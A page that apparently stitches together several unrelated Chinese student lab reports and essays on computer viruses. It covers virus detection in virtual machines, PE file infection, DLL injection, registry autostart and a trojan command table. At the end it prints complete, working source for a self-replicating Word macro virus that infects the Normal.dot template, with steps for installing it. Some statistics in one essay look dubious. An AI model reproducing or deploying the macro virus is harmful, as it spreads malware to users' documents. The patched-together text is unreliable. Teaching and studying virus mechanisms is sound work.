下载文档原格式
计算机病毒防护技术实验报告学院:计算机科学与技术班级:20110616姓名:曾江东学号:2011061624成绩:2014年10月实验1 典型病毒的检测1.1 实验名称熊猫烧香病毒的检测1.2 实验目的掌握典型病毒的检测方法,掌握熊猫烧香病毒的检测方法,掌握威金病毒的检测方法。
1.3 实验环境微机1台(Windows 9x\2000\XP操作系统),熊猫烧香病毒样本、威金病毒样本,熊猫烧香病毒专杀工具、威金病毒专杀工具,VMWare虚拟机软件。
1.4 实验内容及要求1.4.1 熊猫烧香病毒的检测1、备好病毒样本先准备一张含有熊猫烧香病毒的软盘或光盘,或带有熊猫烧香病毒的U盘。
2、运行VMWare虚拟机软件。
为了整个计算机本身的安全或整个实验室系统的安全,让实验在虚拟的环境下进行,3、检测干净系统4、种植熊猫烧香病毒插入含有熊猫烧香病毒的U盘、光盘或者软盘,点击含有熊猫烧香病毒文件夹下的set up.exe文件,这时就将熊猫烧香病毒种植到计算机系统中了。
5、检测中毒后的系统6、得出实验结论1.3.2 威金病毒的检测1、备好病毒样本2、先准备一张含有威金病毒的软盘或光盘,或带有威金病毒的U盘。
3、运行VMWare虚拟机软件。
4、为了整个计算机本身的安全或整个实验室系统的安全,让实验在虚拟的环境下进行,5、检测干净系统6、种植威金病毒插入含有威金病毒的U盘、光盘或者软盘,点击含有威金病毒文件夹下的威金文件,这时就将威金病毒种植到计算机系统中了。
7、检测中毒后的系统8、实验结论1.5 实验设计与实验步骤1.运行VMWare虚拟机软件。
2.插入含有熊猫烧香病毒的U盘、光盘或者软盘,点击含有熊猫烧香病毒文件夹下的setup. exe文件,这时就将熊猫烧香病毒种植到计算机系统中了。
3.查看磁盘是否有一些exe文件的图标被改成了一个座立的熊猫手里捧着三根香。
4.用熊猫烧香病毒专杀工具检测系统是否中毒。
1.6 实验过程与分析通过查看系统磁盘的一些文件,发现一些exe文件确实被改成了熊猫图标,随后利用熊猫烧香病毒专杀工具也检测出系统确实中毒1.7 实验结果总结成功将熊猫烧香病毒植入电脑,并成功检测出来。
计算机病毒的防范随着计算机及计算机网络的发展,伴随而来的计算机病毒传播问题越来越引起人们的关注。
随因特网的流行,有些计算机病毒借助网络爆发流行,如CIH计算机病毒、“爱虫”病毒等,它们与以往的计算机病毒相比具有一些新的特点,给广大计算机用户带来了极大的损失。
当计算机系统或文件染有计算机病毒时,需要检测和消除。
但是,计算机病毒一旦破坏了没有副本的文件,便无法医治。
隐性计算机病毒和多态性计算机病毒更使人难以检测。
在与计算机病毒的对抗中,如果能采取有效的防范措施,就能使系统不染毒,或者染毒后能减少损失。
计算机病毒防范,是指通过建立合理的计算机病毒防范体系和制度,及时发现计算机病毒侵入,并采取有效的手段阻止计算机病毒的传播和破坏,恢复受影响的计算机系统和数据。
计算机病毒利用读写文件能进行感染,利用驻留内存、截取中断向量等方式能进行传染和破坏。
预防计算机病毒就是要监视、跟踪系统内类似的操作,提供对系统的保护,最大限度地避免各种计算机病毒的传染破坏。
计算机病毒的工作方式是可以分类的,防杀计算机病毒软件就是针对已归纳总结出的这几类计算机病毒工作方式来进行防范的。
当被分析过的已知计算机病毒出现时,由于其工作方式早已被记录在案,防杀计算机病毒软件能识别出来;当未曾被分析过的计算机病毒出现时,如果其工作方式仍可被归入已知的工作方式,则这种计算机病毒能被反病毒软件所捕获。
这也就是采取积极防御措施的计算机病毒防范方法优越于传统方法的地方。
计算机病毒防范工作,首先是防范体系的建设和制度的建立。
没有一个完善的防范体系,一切防范措施都将滞后于计算机病毒的危害。
计算机病毒防范体系的建设是一个社会性的工作,不是一两个人、一两家企业能够实现的,需要全社会的参与,充分利用所有能够利用的资源,形成广泛的、全社会的计算机病毒防范体系网络。
一.计算机病毒的技术预防措施下面总结出一系列行之有效的措施供参考。
1、新购置的计算机硬软件系统的测试新购置的计算机是有可能携带计算机病毒的。
病毒理论与防御技术实验报告2015年3月1日实验一:**********一、实验目的1)掌握PE文件格式。
2)了解PE病毒原理。
二、实验步骤1)阅读CVC杂志。
2)学习使用PE Explorer查看不同PE结构文件格式,如exe和dll。
3)文件型病毒演练。
a)实验测试的示例程序包由教师提供,解压后请从病毒包中取得Virus.exe拷贝在当前解压目录中即可运行病毒程序进行测试。
b)为了保持测试的一般性,我们采用的是一个常见的软件ebook;该测试包即为ebook安装目录下的所有程序。
c)测试时请依照软件提示进行,在测试中,我们发现该测试包还具有典型性特点:其中ebookcode.Exe 和 KeyMaker.exe 可以看成一组,它们在感染后能够明显的体现病毒的基本特征,故而杀毒软件Norton能够比较及时的查出是病毒程序;而ebookedit.exe 和 ebrand-it.exe 是另一类程序,它们在感染后很好地体现了病毒的隐藏的特征,在运行初期,杀毒程序很难查出其为病毒程序,只有在该程序感染其他可执行程序,在宿主程序中添加4k的节时,杀毒软件检测到该行为时才能判断是病毒程序。
三、思考题1、详细记录实验步骤、现象、问题。
实验现象:1)PE文件格式按节组织(section)->中病毒之后section number变多(多了一个IS节)中病毒之后Address of entry point程序入口点变化(调用子程序SUB_L0066D58B)2)中病毒文件中病毒文件也具有了感染其他文件的功能。
●病毒重定位:原因:病毒的生存空间就是宿主程序,而因为宿主程序的不同,所以病毒每次插入到宿主程序中的位置也不同。
那么病毒需要用到的变量的位置就无法确定。
这就是病毒首先要重定位的原因。
目的:找到基址举例:在几乎每个病毒的开头都用下面的语句:call deltadelta:pop ebp ;得到delta地址sub ebp,offset delta ;因为在其他程序中基址可能不是默认的所以需要重定位mov dword ptr [ebp+offset appBase],ebp;把扩展基址寄存器ebp中的内容(基址)存入内存appBase位置●API函数地址的获取:步骤:首先获得诸如kernel32.dll,user32.dll的基址,然后再找到真正的函数地址.2、写下你阅读CVC杂志后的读后感,你同意杂志的所表达的倾向吗,你觉得现阶段病毒肆虐和这样的倾向和认识有没有关系,为什么?CVC杂志很有意思,语言幽默,观点明确,并且总结了很多关于病毒的基础知识。
电脑病毒与防治实验报告电脑病毒是一种在计算机系统中传播并破坏数据或干扰正常运行的恶意软件。
在当今数字化社会,电脑病毒越来越成为人们日常生活中的一个隐患。
为了更好地了解电脑病毒的危害以及有效防治方法,我们进行了相关实验并撰写此报告。
### 实验目的通过实验,探讨电脑病毒对计算机系统的危害程度,以及采取何种方法可以有效防治电脑病毒的侵害。
### 实验材料1. 实验室计算机设备2. 各类电脑病毒样本3. 杀毒软件4. 防火墙软件### 实验步骤1. 收集各类型电脑病毒样本,包括文件病毒、网页病毒、邮件病毒等。
2. 将病毒样本分别输入实验室的计算机系统中,观察病毒对系统的影响。
3. 安装杀毒软件,并对感染病毒的计算机进行查杀和清除操作。
4. 启动防火墙软件,设置相关防护策略,阻止病毒入侵计算机系统。
5. 对比有无杀毒软件和防火墙软件的情况下,电脑系统的表现和安全性。
### 实验结果分析经过实验观察和对比分析,我们得出以下结论:1. 电脑病毒的危害程度较大,不仅会导致系统运行缓慢、文件丢失、数据泄露等问题,还可能对计算机系统进行破坏,使其无法正常使用。
2. 安装杀毒软件和启用防火墙软件是预防电脑病毒的有效措施。
杀毒软件可以及时查杀发现的病毒,防火墙软件可以阻止病毒入侵系统。
3. 电脑系统在有杀毒软件和防火墙软件保护下,运行更加稳定,数据更加安全,用户体验更好。
### 实验结论综上所述,电脑病毒对计算机系统的危害不可忽视,因此加强对电脑病毒的防治至关重要。
安装杀毒软件和防火墙软件是预防和治理电脑病毒的有效手段,建议广大用户定期更新杀毒软件和防火墙软件,并加强对网络安全的重视,保护个人和机构的信息安全。
通过本次实验,我们对电脑病毒及其防治方法有了更深入的了解,相信在未来的计算机使用中,将更加注重网络安全,提高电脑系统的安全防护意识。
愿我们的实验报告能为更多人提供有益的参考和启示。
《计算机病毒与防治技术实验报告》班级:姓名:学号:同组人姓名:指导老师:时间:2012年1月目录一、实验目的 (3)二、实验原理 (3)一、整体概要 (3)二、远程线程注入技术 (3)三、病毒的常见自我保护行为 (4)四、注册表 (4)五、病毒的破坏行为 (4)三、实验过程 (5)1、整体过程: (5)2、door.dll和inject.exe功能实现 (5)3、制作病毒过程 (5)4、病毒的整个运行过程 (5)四、实验出现的问题及解决方案 (6)五、实验结果 (6)六、实验体会 (8)七、附录 (9)一、实验目的1、计算机病毒是计算机程序,有着与生物病毒相似的特性,病毒驻留在受感染的计算机内,并不断传播和感染可连接的系统,在满足触发条件时,病毒发作,破坏正常的系统工作,强占系统资源,甚至损坏系统数据。
病毒不但具有普通程序存储和运行的特点,还具有传染性、潜伏性、可触发性、破坏性、针对性、隐蔽性和衍生性等特征。
2、了解病毒的编织技术,才能更好的防治和清除病毒。
3、通过本实验让学生更深入理解计算机病毒的机理及防治方法。
二、实验原理一、整体概要我们将实验目标定在了DLL远程线程注入病毒,即通过一个loader可执行文件运用远程线程技术将DLL文件注入到系统的某个进程中,让其运行,实现破坏功能。
有很多资料称之为“DLL远程线程注入木马”,由于我们并未实现网络传播、窃取信息、利用漏洞等木马功能,所以,我们还是觉得称之为“病毒”更为合理。
该病毒的隐藏性比一般exe病毒高,原因在于Windows操作系统中程序以进程的方式运行,任务管理器只能看到当前运行的进程,如果让木马作为其他进程的一个线程来运行,则在任务管理器中该病毒就彻底消失了。
Windows操作系统其系统API都是通过DLL的形式出现的,应用程序动态链接到DLL来调用API,DLL在内存中只存在一个副本就可以满足不同应用程序的调用了。
DLL不能独立运行,所以无法在启动项目里直接启动它。
计算机病毒实验报告说明1.本课程作业报告是《计算机病毒与反病毒》课程成绩评定的重要依据,须认真完成。
2.报告内容严禁出现雷同,每位同学须独立完成。
若发现抄袭,抄袭者和被抄袭者本课程的成绩均以零分计。
3.要排版,格式应规范,截图一律采用JPG格式(非BMP格式)。
为避免抄袭,用图像编辑软件在截图右下角“嵌入”自己的学号或姓名。
实验报告的格式是否规范、截图是否嵌入了自己的学号或姓名,是评价报告质量的考量因素。
4.说明文字与实验截图相配合,若只有说明文字,或只有截图,则成绩为不及格。
5.只提交报告电子版。
在规定的日期内,通过电子邮件发送到[emailprotected],若三天之内没有收到内容为“已收到”的回复确认Email,请再次发送或电话联系任课老师。
6.为了便于归档,实验报告Word文档的命名方式是“学号姓名-计算机病毒实验报告.doc”,如“20xx12345张三-计算机病毒课程报告.doc”。
注意:提交报告截止日期以QQ群通知时间为准(一般在考试周下周周三),若因没有及时提交实验报告,导致课程成绩为“缺考”的,责任自负。
实验一程序的自动启动一、实验目的(1)验证利用注册表特殊键值自动启动程序的方法;(2)检查和熟悉杀毒软件各组成部分的自动启动方法。
二、实验内容与要求(1)在注册表自动加载程序主键中,添加加载目标程序键值(自己指派任意程序),重启操作系统,检查是否能自动成功加载目标程序。
罗列5或5个以上能自动启动目标程序的键值,并用其中某一个启动自己指派的程序。
(2)检查/分析你所使用的计算机中杀毒软件系统托盘程序、底层驱动程序等组成部分的自动启动方式。
三、实验环境与工具操作系统:Windows XP/Windows Vista/Windows 7工具软件:RegEdit.exe,AutoRuns,或其他注册表工具软件;杀毒软件四、实验步骤与实验结果一)按启动文件夹的方法1、“启动”文件夹是最常见的自启动文件夹。
计算机病毒及其防范措施探究的研究报告计算机病毒及其防范措施探究计算机病毒是指一种能自我复制,传播和感染其他计算机程序的恶意软件。
它可以极大地破坏计算机系统,窃取个人信息,甚至导致计算机系统崩溃。
在这篇报告中,我们将探讨计算机病毒及其防范措施。
病毒类型计算机病毒有许多种类,其中一些包括:1. 爆发病毒:这种病毒会在计算机系统中迅速传播,并在系统发生崩溃之前迅速复制自己。
2. 木马病毒:这种病毒通常是伪装成可信的程序,实际上是恶意软件,可以在用户不知情的情况下偷窃个人信息。
3. 文件病毒:这种病毒会在感染后感染其他程序或操作系统,并使它们变得受损或不可用。
防范措施虽然计算机病毒的威胁非常严重,但用户可以采取一些预防措施来保护自己的计算机系统:1. 安装防病毒软件:就像安装防火墙来保护家庭一样,在计算机上安装防病毒软件可以帮助识别并解决潜在的病毒问题。
2. 更新操作系统和软件:在保持操作系统和软件更新的情况下,可以确保计算机系统不受已知漏洞的影响。
3. 设置强密码:使用强密码可以保护您的计算机系统免受不良攻击,例如暴力破解。
4. 不要打开未知的电子邮件附件:不要打开来自未知来源的邮件附件,因为它们很可能包含病毒。
5. 避免下载来历不明的软件:通过下载来自可信渠道的软件来避免感染计算机病毒。
结论计算机病毒是一种严重的问题,但用户可以通过采取预防措施来减少其威胁。
在计算机上安装防病毒软件,更新操作系统和软件,使用强密码,不要打开未知的邮件附件,避免下载来历不明的软件,这些措施都有助于减轻病毒对计算机系统造成的损害。
通过注意这些控制措施,我们可以更好地保护我们的计算机免受病毒攻击。
为了更好的了解计算机病毒的影响及其防范措施,我们可以通过相关数据进行分析。
以下是一些相关数据:1. 美国国家安全局表示,每天有超过三百万个计算机被感染了病毒,而这个数字还在上升。
2. 根据Symantec公司的统计数据,2019年,全球平均每400个电子邮件中就有一个是恶意软件。
计算机病毒实验报告计算机病毒实验报告引言:计算机病毒是一种恶意软件,可以对计算机系统造成破坏和损失。
为了更好地了解计算机病毒的特点和对计算机系统的影响,我们进行了一系列的实验。
本报告将详细介绍我们的实验过程、结果和结论。
实验一:病毒传播方式我们首先研究了计算机病毒的传播方式。
通过在一个封闭的网络环境中模拟实验,我们发现计算机病毒主要通过电子邮件、可移动存储设备和互联网下载等方式进行传播。
这些传播方式都依赖于用户的不慎操作或者系统的漏洞。
实验二:病毒对系统性能的影响我们接着研究了计算机病毒对系统性能的影响。
在一个实验环境中,我们分别在未感染和感染病毒的计算机上进行了性能测试。
结果显示,感染病毒的计算机在运行速度、响应时间和网络连接方面都明显下降。
这是因为计算机病毒会占用系统资源、干扰正常的进程和网络通信。
实验三:病毒防护措施为了更好地保护计算机系统免受病毒攻击,我们进行了一系列的病毒防护措施实验。
我们测试了不同的杀毒软件和防火墙,并对其进行了性能和效果的评估。
结果显示,合适的杀毒软件和防火墙可以有效地检测和阻止病毒的传播,保护计算机系统的安全。
实验四:病毒对个人隐私的威胁除了对系统性能的影响,计算机病毒还可能对个人隐私造成威胁。
我们进行了一项实验,模拟了一个病毒窃取个人信息的场景。
通过在一台计算机中安装了一个窃取密码的病毒,我们发现该病毒能够成功获取用户的登录信息和敏感数据。
这个实验结果提醒我们,保护个人隐私是非常重要的,我们应该谨慎对待未知来源的文件和链接。
结论:通过一系列的实验,我们对计算机病毒有了更深入的了解。
计算机病毒的传播方式多种多样,主要依赖于用户的不慎操作和系统的漏洞。
感染病毒会导致计算机系统性能下降,并可能对个人隐私造成威胁。
为了保护计算机系统的安全,我们应该采取合适的病毒防护措施,如安装杀毒软件和防火墙,并且要时刻保持警惕,不轻易打开未知来源的文件和链接。
总结:计算机病毒是现代计算机系统中的一大威胁,对系统性能和个人隐私都有着巨大的影响。
对计算机病毒的报告在信息化技术高速发展的今天,计算机成为涉及人们生活的各个领域的不可缺少的现代化工具,计算机在各个领域的普遍应用,给人们带来了极大的方便。
任何事物都具有两面性,计算机也不例外,它也是一把两面开刃的刀子,当他感染了计算机病毒以后,又具有非常强大的破坏力。
为了解计算机病毒的成因、破坏性和有效防范方法,笔者对计算机病毒进行了一些简单的调查研究。
一、对计算机病毒进行调查的一些数据整理(一)什么是计算机病毒计算机病毒(Computer Virus)在《中华人民共和国计算机信息系统安全保护条例》中被明确定义,所谓计算机病毒指“编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码”。
与医学上的“病毒”不同,计算机病毒不是天然存在的,是某些人利用计算机软件和硬件所固有的脆弱性编制的一组指令集或程序代码。
它能通过某种途径潜伏在计算机的存储介质(或程序)里,当达到某种条件时即被激活,通过修改其他程序的方法将自己的精确拷贝或者可能演化的形式放入其他程序中,从而感染其他程序,对计算机资源进行破坏。
由此可见,所谓的病毒就是人为造成的,而且对其他用户的危害性很大。
(二)计算机病毒的特点1、隐蔽性:病毒程序大都小巧玲珑,一般只有几百或1k字节,可以隐蔽在可执行文件夹或数据文件中,有的可以通过病毒软件检查出来,有的根本就查不出来。
一般在没有防护措施的情况下,计算机病毒程序取得系统控制权后,可以在很短的时间里感染大量程序。
而且受到传染后,计算机系统通常仍能正常运行,使用户不会感到任何异常。
2、传染性:传染性是病毒的一个重要特征,也是确定一个程序是否是计算机病毒的首要条件。
病毒具有很强的再生机制,它通过各种渠道从已被感染的计算机扩散到未被感染的计算机,这段程序代码一旦进入计算机并得以执行,它会搜寻其他符合其传染条件的程序或存储介质,确定目标后再将自身代码插入其中,达到自我繁殖的目的。
计算机病毒实验报告
《计算机病毒实验报告》
近年来,计算机病毒成为了网络安全的重要问题。
为了深入研究计算机病毒的特性和对网络系统的影响,我们进行了一系列的实验。
在实验中,我们选择了几种常见的计算机病毒样本,并对其进行了分析和测试。
首先,我们对这些病毒样本进行了静态分析,包括对其代码结构、功能特性和传播途径的研究。
通过反汇编和代码审查,我们成功地分析出了这些病毒的工作原理和传播方式。
我们发现,这些病毒样本大多采用了文件传播和网络传播的方式,利用漏洞和弱密码等手段感染目标系统。
其次,我们对这些病毒样本进行了动态分析,包括在受控环境下的运行实验和行为监测。
通过在虚拟机环境中模拟感染过程,我们成功地捕获了这些病毒的行为数据,并对其进行了深入分析。
我们发现,这些病毒样本在感染目标系统后,会对系统文件进行篡改、窃取用户信息或者发起网络攻击等恶意行为。
最后,我们对这些病毒样本进行了安全性测试,包括针对其传播途径和感染后的影响进行了模拟实验。
通过在受控网络环境中模拟病毒传播和感染过程,我们成功地验证了这些病毒的危害性,并提出了相应的防范措施和安全建议。
通过这些实验,我们深入了解了计算机病毒的特性和对网络系统的影响,为进一步加强网络安全提供了重要的数据支持和科学依据。
我们希望通过我们的研究成果,能够为网络安全领域的相关工作提供有益的参考和借鉴,共同维护网络安全和信息安全的大局。
南京航空航天大学计算机病毒及防治上机实验报告学院:理学院专业:信息与计算科学学号:081310128姓名:王晨雨授课老师:薛明富二〇一六年十二月实验一:引导型病毒实验 (2)【实验目的】 (2)【实验平台】 (2)【试验内容】 (2)实验二:Com病毒实验 (6)【实验目的】 (6)【实验平台】 (6)【试验内容】 (6)实验三:PE文件格式实验 (9)实验四:32位文件型病毒实验 (11)实验五:简单的木马实验 (14)实验七:木马病毒清除实验(选做) (19)实验八:Word宏病毒实验(一) (22)实验目的 (22)实验所需条件和环境 (22)实验内容和分析 (23)实验九:Word宏病毒实验(二) (27)清除宏病毒 (29)实验十:Linux脚本病毒实验(选做) (32)实验十二:基于U盘传播的蠕虫病毒实验 (33)实验十三:邮件型病毒实验 (36)实验十四:Web恶意代码实验 (39)实验一: (39)实验二: (39)实验一:引导型病毒实验【实验目的】通过实验,了解引导区病毒的感染对象和感染特征,重点学习引导病毒的感染机制和恢复感染病毒文件的方法,提高汇编语言的使用能力。
实验内容引导阶段病毒由软盘感染硬盘实验。
通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制:阅读和分析病毒的代码。
DOS运行时病毒由硬盘感染软盘的实现。
通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制:阅读和分析病毒的代码。
【实验平台】VMWare Workstation 12 PROMS-DOS 7.10【试验内容】第一步:环境安装安装虚拟机VMWare,在虚拟机环境内安装MS-DOS 7.10环境。
第二步:软盘感染硬盘1)运行虚拟机,检查目前虚拟硬盘是否含有病毒,图1表示没有病毒正常启动硬盘的状态。
2)在附书资源中复制含有病毒的虚拟软盘virus.img3)将含有病毒的软盘插入虚拟机引导,可以看到闪动的字符*^_^*,如图2所示,按任意键进入图3。
第三步:验证硬盘已经被感染1)取出虚拟软盘,通过硬盘引导,再次出现了病毒的画面如图4。
2)按任意键后正常引导了DOS系统如图5。
可见,硬盘已被感染。
第四步:硬盘感染软盘1)下载empty.img,并且将它插入虚拟机,启动计算机,由于该盘为空,如图6.2)取出虚拟软盘,从硬盘启动,通过命令format A:/q快速格式化软盘。
可能提示出错,这时只要按R键即可。
如图7.3)成功格式化后的结果如图8。
4)不要取出虚拟软盘,重新启动虚拟机,这时是从empty.img引导,可以看到病毒的画面,如图9。
按任意键进入图10.可见,病毒已经成功由硬盘传染给了软盘。
实验截图:1.软盘启动后:2.硬盘启动后:实验二:Com病毒实验【实验目的】1、掌握COM病毒的传播原理。
2、掌握MASM611编译工具的使用。
【实验平台】1、MS-DOS 7.102、MASM611【试验内容】1、安装MS-DOS 7.10环境。
虚拟机安装该环境亦可,步骤在此不再赘述。
2、在MS-DOS C:\MASM目录下安装MASM611,然后将binr目录下的link.exe复制到bin目录下。
3、在com目录下复制病毒程序Virus.asm及测试程序源代码BeInfected.asm4、编译链接BeInfected.asm,形成BeInfectedcom测试程序5、编译链接virus.asm,生成病毒程序virus.exe。
6、在C:\MASM\Bin目录下建立del.txt文件,并且将“”和病毒代码2“virus.asm”复制到此目录下。
7、执行“”观察结果。
8、编译并连接“virus.asm”生成“virus.exe”,执行此exe文件以感染“”文件并且自动删除del.txt,而后执行“”可以发现感染后的结果。
实验截图:1.编译存储好文件:2.Dos下查看文件夹内容:3.查看TEST的内容:4.运行病毒程序:5.查看感染病毒后文件夹内容:6.查看感染病毒后TEST的内容:实验三:PE文件格式实验【实验目的】了解PE文件基本结构【实验环境】运行环境:Windows 2000、Windows 9x、Windows NT 以及 Windows XP编译环境: Visual Studio 6.0【实验步骤】使用编译环境打开源代码工程,编译后可以生成winpe.exe。
预备步骤:找任意一个Win32下的Exe文件作为查看对象。
实验内容:运行winpe.exe,并打开任一exe文件,选择不同的菜单,可以查看到exe文件的内部结构。
实验截图:感染前感染后第一处:第二处:第三处:第四处:第五处:感染前:感染后:实验四:32位文件型病毒实验【实验目的】了解文件型病毒的基本制造过程了解病毒的感染、破坏机制,进一步认识病毒程序掌握文件型病毒的特征和内在机制【实验环境】运行环境Windows 2000、Windows 9x、Windows NT 和 Windows XP【实验步骤】目录中的virus.rar包中包括Virus.exe(编译的病毒程序)、软件使用说明书.doc(请仔细阅读)、源代码详解.doc(对代码部分加入了部分注释)以及pll.asm(程序源代码)。
Example.rar包中选取的是一个常用程序(ebookedit)安装后的安装目录下的程序,用于测试病毒程序。
预备步骤:将example.rar解压到某个目录。
解压完毕后,应该在该目录下有Buttons 目录、ebookcode.exe、ebookedit.exe、ebrand-it.exe以及keymaker.exe等程序,然后把virus.rar包解压后的Virus.exe复制到该目录中。
实验内容:通过运行病毒程序观看各步的提示以了解病毒的内在机制。
实验截图:1.感染前准备:2.感染过程:3.感染后:4.感染文件比对实验五:简单的木马实验【实验目的】掌握木马的基本原理【实验环境】Windows XP 操作系统Visual Studio 6.0 编程环境【实验步骤】(1)复制实验文件到实验的计算机上。
其中,SocketListener目录下是木马Server端源代码,SocketCommand目录下是木马Client端源代码。
(2)用Visual Studio 6.0环境分别编译这两部分代码。
(3)运行SocketListener应用程序,也就是启动了木马被控端。
(4)运行SocketCommand应用程序,也就是启动了木马的控制端,可以在控制端执行命令来控制被控制端。
实验支持的命令参考表:命令命令含义CMD执行应用程序!SHUT退出木马FILEGET获得远程文件EDITCONF编辑配置文件LIST列目录VIEW查看文件内容CDOPEN关CDCDCLOSE开CDREBOOT重启远端计算机实验截图:1.建立连接:2.发送指令及成功后结果:(1)运行程序:(2)关闭木马:(3)获得文件:(5)查看文件:(7)重启计算机:实验七:木马病毒清除实验(选做)【实验目的】掌握木马病毒清除的基本原理【实验平台】Windows 32 位操作系统Visual Studio 7.0 编译环境【实验步骤】文件Antitrojan.sln为工程文件。
使用Visual Studio编译该工程,生成Antitrojan.exe可执行程序。
执行Antitrojan.exe观察执行效果。
实验截图:1.确认木马存在:2.进行编译:(1)修改试验机名字:(2)添加查杀代号:(3)添加查杀代码:3.清除成功:实验八:Word宏病毒实验(一)实验目的Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。
本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。
实验所需条件和环境硬件设备:局域网,终端PC机。
系统软件:Windows系列操作系统支撑软件:Word 2003软件设置:关闭杀毒软;打开Word 2003,在工具宏安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic 项目的访问实验环境配置如下图所示:受感染终端受感染Word文档被感染终端宏病毒传播示意图实验内容和分析为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。
例1 自我复制,感染word公用模板和当前文档代码如下:'Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.SaveNormalPrompt = FalseOurcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate ThenSet Host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith HostIf .Lines(1.1) <> "'Micro-Virus" Then.DeleteLines 1, .CountOfLines.InsertLines 1, Ourcode.ReplaceLine 2, "Sub Document_Close()"If ThisDocument = nomaltemplate Then.ReplaceLine 2, "Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd WithMsgBox "MicroVirus by Content Security Lab"End Sub打开一个word文档,然后按Alt+F11调用宏编写窗口(工具宏Visual Basic宏编辑器),在左侧的project—>Microsoft Word对象ThisDocument中输入以上代码,保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word 文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。
